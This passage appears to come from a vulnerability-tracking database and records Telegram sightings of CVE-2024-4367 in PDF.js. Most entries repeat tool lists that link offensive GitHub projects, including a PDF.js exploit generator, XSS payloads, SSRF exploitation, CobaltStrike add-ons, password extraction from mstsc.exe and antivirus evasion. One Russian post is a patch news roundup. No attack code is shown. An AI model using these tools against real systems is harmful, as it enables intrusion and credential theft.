firewalls/DPI - Static binary available''\n\nhttps://github.com/erebe/wstunnel\n\nOctoberfest7/MemFiles: A CobaltStrike toolkit to write files produced by Beacon to memory instead of disk''\n\nhttps://github.com/Octoberfest7/MemFiles\n\nelastic/SWAT: Simple Workspace Attack Tool (SWAT) is a tool for simulating malicious behavior against Google Workspace in reference to the MITRE ATT&CK framework.''\n\nhttps://github.com/elastic/SWAT\n\npmatula/Windows-Internals-Learning-Resources\n\nhttps://github.com/pmatula/Windows-Internals-Learning-Resources\n\nIntegration-IT/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.''\n\nhttps://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet\n\n0xEr3bus/RdpStrike: Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP.''\n\nhttps://github.com/0xEr3bus/RdpStrike\n\nwh0amitz/SharpADWS: Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS).''\n\nhttps://github.com/wh0amitz/SharpADWS\n\nsrlabs/Certiception: An ADCS honeypot to catch attackers in your internal network.''\n\nhttps://github.com/srlabs/Certiception\n\nmertdas/SharpIncrease: A Tool that aims to evade av with binary padding''\n\nhttps://github.com/mertdas/SharpIncrease\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-18T08:56:28.000000Z"}, {"uuid": "af98846e-2e02-4e19-88af-da15ec2931cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "Telegram/3sM3oVD50m3NvoIQWG6DGAEVGmijitmKbRK6SaOWq032uLY", "content": "", "creation_timestamp": "2025-02-17T22:00:06.000000Z"}, {"uuid": "e8a6dfed-ab80-468a-9fc3-21ae6c849d25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3440", "content": "Tools - Hackers Factory \n\nBloodHoundAD/BARK: BloodHound Attack Research Kit''\n\nhttps://github.com/BloodHoundAD/BARK\n\nCreate yourself #exp of CVE-2024-4367: PDF.js\n\nhttps://github.com/rzte/pdf-exploit\n\nCVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow\n\nhttps://github.com/Brut-Security/CVE-2024-4879\n\n''GitHub - erebe/wstunnel: Tunnel all your traffic over Websocket or HTTP2 - Bypass firewalls/DPI - Static binary available''\n\nhttps://github.com/erebe/wstunnel\n\nOctoberfest7/MemFiles: A CobaltStrike toolkit to write files produced by Beacon to memory instead of disk''\n\nhttps://github.com/Octoberfest7/MemFiles\n\nelastic/SWAT: Simple Workspace Attack Tool (SWAT) is a tool for simulating malicious behavior against Google Workspace in reference to the MITRE ATT&CK framework.''\n\nhttps://github.com/elastic/SWAT\n\npmatula/Windows-Internals-Learning-Resources\n\nhttps://github.com/pmatula/Windows-Internals-Learning-Resources\n\nIntegration-IT/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.''\n\nhttps://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet\n\n0xEr3bus/RdpStrike: Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP.''\n\nhttps://github.com/0xEr3bus/RdpStrike\n\nwh0amitz/SharpADWS: Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS).''\n\nhttps://github.com/wh0amitz/SharpADWS\n\nsrlabs/Certiception: An ADCS honeypot to catch attackers in your internal network.''\n\nhttps://github.com/srlabs/Certiception\n\nmertdas/SharpIncrease: A Tool that aims to evade av with binary padding''\n\nhttps://github.com/mertdas/SharpIncrease\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-18T08:56:31.000000Z"}, {"uuid": "02c94fff-c76b-4544-98c7-d06305af93fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatCommunity/7800", "content": "Tools - Hackers Factory\n\nCross Site Scripting ( XSS ) Vulnerability Payload List \n\nhttps://github.com/payloadbox/xss-payload-list\n\nYARA detection rule for CVE-2024-4367 arbitrary javascript execution in PDF.js \n\nhttps://github.com/spaceraccoon/detect-cve-2024-4367\n\nThe Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit. \n\nhttps://github.com/0xInfection/XSRFProbe\n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nAutomation for javascript recon in bug bounty. \n\nhttps://github.com/KathanP19/JSFScan.sh\n\nTempMail is a simple web application that allows you to generate temporary email addresses and view the emails received by these addresses. \n\nhttps://github.com/mehmetkahya0/temp-mail \n\nThis Repositories contains list of One Liners with Descriptions and Installation requirements \n\nhttps://github.com/thecybertix/One-Liner-Collections\n\nAutomatic SSRF fuzzer and exploitation tool \n\nhttps://github.com/swisskyrepo/SSRFmap\n\nA tool to fastly get all javascript sources/files \n\nhttps://github.com/003random/getJS\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nInQL is a robust, open-source Burp Suite extension for advanced GraphQL testing, offering intuitive vulnerability detection, customizable scans, and seamless Burp integration. \n\nhttps://github.com/doyensec/inql\n\n#HackersFactory", "creation_timestamp": "2024-05-25T15:32:53.000000Z"}, {"uuid": "f667ed7c-1992-4d4a-b843-3e3dd887e800", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/GhostsForum/21550", "content": "Tools - Hackers Factory\n\nCross Site Scripting ( XSS ) Vulnerability Payload List \n\nhttps://github.com/payloadbox/xss-payload-list\n\nYARA detection rule for CVE-2024-4367 arbitrary javascript execution in PDF.js \n\nhttps://github.com/spaceraccoon/detect-cve-2024-4367\n\nThe Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit. \n\nhttps://github.com/0xInfection/XSRFProbe\n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nAutomation for javascript recon in bug bounty. \n\nhttps://github.com/KathanP19/JSFScan.sh\n\nTempMail is a simple web application that allows you to generate temporary email addresses and view the emails received by these addresses. \n\nhttps://github.com/mehmetkahya0/temp-mail \n\nThis Repositories contains list of One Liners with Descriptions and Installation requirements \n\nhttps://github.com/thecybertix/One-Liner-Collections\n\nAutomatic SSRF fuzzer and exploitation tool \n\nhttps://github.com/swisskyrepo/SSRFmap\n\nA tool to fastly get all javascript sources/files \n\nhttps://github.com/003random/getJS\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nInQL is a robust, open-source Burp Suite extension for advanced GraphQL testing, offering intuitive vulnerability detection, customizable scans, and seamless Burp integration. \n\nhttps://github.com/doyensec/inql\n\n#HackersFactory", "creation_timestamp": "2024-05-25T15:30:30.000000Z"}, {"uuid": "5adb4a98-f636-42c9-93be-81be7bb6265f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "Telegram/B9nenhStHVu8HlrWPEr5ILddIW-5Ea6-Kyn0KKSaLy-wE28", "content": "", "creation_timestamp": "2024-05-24T19:16:19.000000Z"}, {"uuid": "a5041dd2-ac54-4869-bb35-61256ebe2cb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3248", "content": "Tools - Hackers Factory\n\nCross Site Scripting ( XSS ) Vulnerability Payload List \n\nhttps://github.com/payloadbox/xss-payload-list\n\nYARA detection rule for CVE-2024-4367 arbitrary javascript execution in PDF.js \n\nhttps://github.com/spaceraccoon/detect-cve-2024-4367\n\nThe Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit. \n\nhttps://github.com/0xInfection/XSRFProbe\n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nAutomation for javascript recon in bug bounty. \n\nhttps://github.com/KathanP19/JSFScan.sh\n\nTempMail is a simple web application that allows you to generate temporary email addresses and view the emails received by these addresses. \n\nhttps://github.com/mehmetkahya0/temp-mail \n\nThis Repositories contains list of One Liners with Descriptions and Installation requirements \n\nhttps://github.com/thecybertix/One-Liner-Collections\n\nAutomatic SSRF fuzzer and exploitation tool \n\nhttps://github.com/swisskyrepo/SSRFmap\n\nA tool to fastly get all javascript sources/files \n\nhttps://github.com/003random/getJS\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nInQL is a robust, open-source Burp Suite extension for advanced GraphQL testing, offering intuitive vulnerability detection, customizable scans, and seamless Burp integration. \n\nhttps://github.com/doyensec/inql\n\n#HackersFactory", "creation_timestamp": "2024-05-25T15:30:14.000000Z"}, {"uuid": "1b8a93d9-2057-4afa-bc13-401c455ca330", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "seen", "source": "https://t.me/proxy_bar/2165", "content": "pdf exploit\n*\n\u0421\u043e\u0437\u0434\u0430\u0442\u044c \u0441\u0432\u043e\u0439\n\n#CVE-2024-4367 #pdf", "creation_timestamp": "2024-07-14T08:20:16.000000Z"}, {"uuid": "c4733206-15ab-4d93-b009-cb8bd7cf5588", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6965", "content": "Tools - Hackers Factory \n\nBloodHoundAD/BARK: BloodHound Attack Research Kit''\n\nhttps://github.com/BloodHoundAD/BARK\n\nCreate yourself #exp of CVE-2024-4367: PDF.js\n\nhttps://github.com/rzte/pdf-exploit\n\nCVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow\n\nhttps://github.com/Brut-Security/CVE-2024-4879\n\n''GitHub - erebe/wstunnel: Tunnel all your traffic over Websocket or HTTP2 - Bypass firewalls/DPI - Static binary available''\n\nhttps://github.com/erebe/wstunnel\n\nOctoberfest7/MemFiles: A CobaltStrike toolkit to write files produced by Beacon to memory instead of disk''\n\nhttps://github.com/Octoberfest7/MemFiles\n\nelastic/SWAT: Simple Workspace Attack Tool (SWAT) is a tool for simulating malicious behavior against Google Workspace in reference to the MITRE ATT&CK framework.''\n\nhttps://github.com/elastic/SWAT\n\npmatula/Windows-Internals-Learning-Resources\n\nhttps://github.com/pmatula/Windows-Internals-Learning-Resources\n\nIntegration-IT/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.''\n\nhttps://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet\n\n0xEr3bus/RdpStrike: Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP.''\n\nhttps://github.com/0xEr3bus/RdpStrike\n\nwh0amitz/SharpADWS: Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS).''\n\nhttps://github.com/wh0amitz/SharpADWS\n\nsrlabs/Certiception: An ADCS honeypot to catch attackers in your internal network.''\n\nhttps://github.com/srlabs/Certiception\n\nmertdas/SharpIncrease: A Tool that aims to evade av with binary padding''\n\nhttps://github.com/mertdas/SharpIncrease\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-18T08:56:28.000000Z"}, {"uuid": "c493cd32-45db-42d2-88af-8522de4830f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/lcmysecteamch/7847", "content": "Tools - Hackers Factory\n\nCross Site Scripting ( XSS ) Vulnerability Payload List \n\nhttps://github.com/payloadbox/xss-payload-list\n\nYARA detection rule for CVE-2024-4367 arbitrary javascript execution in PDF.js \n\nhttps://github.com/spaceraccoon/detect-cve-2024-4367\n\nThe Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit. \n\nhttps://github.com/0xInfection/XSRFProbe\n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nAutomation for javascript recon in bug bounty. \n\nhttps://github.com/KathanP19/JSFScan.sh\n\nTempMail is a simple web application that allows you to generate temporary email addresses and view the emails received by these addresses. \n\nhttps://github.com/mehmetkahya0/temp-mail \n\nThis Repositories contains list of One Liners with Descriptions and Installation requirements \n\nhttps://github.com/thecybertix/One-Liner-Collections\n\nAutomatic SSRF fuzzer and exploitation tool \n\nhttps://github.com/swisskyrepo/SSRFmap\n\nA tool to fastly get all javascript sources/files \n\nhttps://github.com/003random/getJS\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nInQL is a robust, open-source Burp Suite extension for advanced GraphQL testing, offering intuitive vulnerability detection, customizable scans, and seamless Burp integration. \n\nhttps://github.com/doyensec/inql\n\n#HackersFactory", "creation_timestamp": "2024-05-25T15:33:16.000000Z"}, {"uuid": "721fee6f-a798-4666-b288-f6f6de03253c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "seen", "source": "https://t.me/true_secator/6347", "content": "\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0442\u0440\u0435\u043d\u0434\u043e\u0432\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u043d\u0430\u0447\u043d\u0435\u043c \u0441 \u00ab\u0442\u0440\u0435\u043d\u0434\u043e\u0432\u043e\u0439\u00bb.\n\n1. Trend Micro \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043b\u044f \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0441\u0432\u043e\u0435\u043c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Cloud Edge \u0441 CVSS 9,8/10.\n\nCVE-2024-48904 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438 \u0434\u043b\u044f \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u043a\u043e\u043c\u0430\u043d\u0434 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435, \u0432 \u0441\u0432\u044f\u0437\u0438 \u0441 \u0447\u0435\u043c \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a \u043f\u043e\u043f\u0440\u043e\u0441\u0438\u043b \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0435\u0435 \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435.\n\n2. VMware \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0432\u0442\u043e\u0440\u0443\u044e \u043f\u043e\u043f\u044b\u0442\u043a\u0443 \u0434\u043b\u044f \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 vCenter Server, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0435\u0449\u0435 \u0432 \u0438\u044e\u043d\u0435 \u043d\u0430 Matrix Cup 2024 \u0432 \u041a\u041d\u0420.\n\n\u041a\u0430\u043a \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f vCenter, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0435 17 \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u044f 2024 \u0433\u043e\u0434\u0430, \u043d\u0435 \u043f\u043e\u043b\u043d\u043e\u0439 \u043c\u0435\u0440\u0435 \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u043b\u0438 CVE-2024-38812 \u0441 CVSS 9,8/10, \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0435\u0439 \u043f\u043e \u044d\u0442\u043e\u043c\u0443 \u043f\u043e\u0432\u043e\u0434\u0443 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a \u043d\u0435 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u043b.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u043a\u0443\u0447\u0438 \u0432 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 \u0440\u0430\u0441\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u0432\u044b\u0447\u0438\u0441\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0441\u0440\u0435\u0434\u044b/\u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u0437\u043e\u0432\u0430 \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440 (DCERPC) \u0432 vCenter Server.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a, \u0438\u043c\u0435\u044e\u0449\u0438\u0439 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a vCenter Server, \u043c\u043e\u0436\u0435\u0442 \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u044d\u0442\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0432 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0439 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u043f\u0430\u043a\u0435\u0442, \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0438\u0439 \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u043e\u0432\u044b\u0439 \u043f\u0430\u0442\u0447 VCenter Server \u0442\u0430\u043a\u0436\u0435 \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-38813 (CVSS 7,5/10), \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0443\u044e \u0441 EoP \u0438 \u0442\u0430\u043a\u0436\u0435 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u043c\u0443\u044e \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u043e\u0439 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u043f\u0430\u043a\u0435\u0442\u0430.\n\n3. \u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0430\u043d\u0442\u0438\u0447\u0438\u0442-\u0441\u0438\u0441\u0442\u0435\u043c\u044b BattlEye \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442 \u043e \u043d\u0435\u0439\u0442\u0440\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0431\u0430\u043d\u0438\u0442\u044c \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u044b \u0434\u0440\u0443\u0433\u0438\u0445 \u0438\u0433\u0440\u043e\u043a\u043e\u0432.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u043b\u0430 \u0441\u0440\u0430\u0437\u0443 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0438\u0433\u0440, \u0432\u043a\u043b\u044e\u0447\u0430\u044f PvP-\u0438\u0433\u0440\u044b, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a PUBG, Rainbow Six Siege \u0438 Escape from Tarkov.\n\n\u041a\u043e\u043c\u0430\u043d\u0434\u0430 \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0441\u0435\u0439\u0447\u0430\u0441 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u043d\u043e \u0441 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044f\u043c\u0438 \u0438\u0433\u0440 \u043d\u0430\u0434 \u0430\u043d\u043d\u0443\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u00ab\u043a\u0440\u0438\u0432\u044b\u0445\u00bb \u0431\u0430\u043d\u043e\u0432.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043e\u0448\u0438\u0431\u043a\u0430 BattlEye \u0431\u044b\u043b\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0430 \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0434\u0435\u043d\u044c \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a Activision \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u0439\u00a0\u0431\u0430\u0433 \u0432 \u0430\u043d\u0442\u0438\u0447\u0438\u0442\u0435 Call of Duty.\n\n4. Atlassian \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432\u044b\u0441\u043e\u043a\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 \u0432 Bitbucket, Confluence \u0438 Jira Service Management.\n\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f Bitbucket Data Center \u0438 Server \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0443\u044e CVE-2024-21147 \u0432 Java Runtime Environment (JRE), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u043d\u0435\u0441\u0430\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0434\u043e\u0441\u0442\u0443\u043f\u0443 \u043a \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c \u0438 \u0438\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044e.\n\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f Confluence Data Center \u0438 Server \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0442 \u0447\u0435\u0442\u044b\u0440\u0435 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0434\u0432\u0435 \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 \u0434\u0430\u0442 JavaScript Moment.js, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u044b\u043b\u0438 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u044b \u0432 2022 \u0433\u043e\u0434\u0443.\n\nCVE-2022-24785 \u0438 CVE-2022-31129 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u044e\u0442\u0441\u044f \u043a\u0430\u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0431\u0445\u043e\u0434\u0430 \u043f\u0443\u0442\u0438 \u0438 ReDoS, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0436\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0442\u0430\u043a\u0436\u0435 \u0430\u043d\u043e\u043d\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f CVE-2024-4367, \u043e\u0448\u0438\u0431\u043a\u0438 XSS, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 HTML \u0438\u043b\u0438 JavaScript \u0432 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0434\u043b\u044f CVE-2024-29131, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Apache Commons Configuration, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a DoS.\n\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f Jira Service Management Data Center \u0438 Server \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0442 CVE-2024-7254 - \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0431\u0443\u0444\u0435\u0440\u0430 Protobuf, \u043a\u043e\u0442\u043e\u0440\u0430\u044f 